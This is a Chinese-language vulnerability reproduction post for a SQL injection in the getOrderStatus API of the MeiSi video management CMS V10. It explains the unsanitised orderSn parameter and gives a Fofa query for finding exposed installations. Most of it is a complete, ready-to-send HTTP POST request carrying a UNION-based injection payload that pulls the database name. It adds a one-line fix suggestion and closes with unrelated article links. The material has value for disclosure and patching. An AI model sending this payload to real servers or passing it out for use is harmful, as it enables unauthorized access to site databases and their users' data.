魅思CMS getOrderStatus SQL注入漏洞复现

0x01 漏洞描述:

魅思是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。

在位于 /controller/Api.php 控制器中的getOrderStatus 方法传入后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生。

0x02 影响版本:

魅思 V10

0x03 搜索语句:

Fofa:app="魅思-视频管理系统"

0x04 漏洞复现:

复制代码
POST /api/getOrderStatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(database() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

0x05 修复建议:

使用预编译语句并对键入的特殊字符进行编码。

相关推荐
OpenVINO生态社区20 分钟前
【汽车功能安全:软件与硬件缺一不可】
数据库·安全·汽车
一口一个橘子32 分钟前
[ctfshow web入门] web6
web安全·网络安全
virelin_Y.lin12 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
上线之叁12 小时前
小迪安全110-tp框架,版本缺陷,不安全写法,路由访问,利用链
安全
计算机毕设定制辅导-无忧学长13 小时前
TDengine 权限管理与安全配置实战(二)
大数据·安全·tdengine
☞无能盖世♛逞何英雄☜14 小时前
Upload-labs靶场通关
安全
zhu128930355615 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素16 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB616 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
蒜白18 小时前
28--当路由器开始“宫斗“:设备控制面安全配置全解
安全·网络工程师·路由·ospf·bgp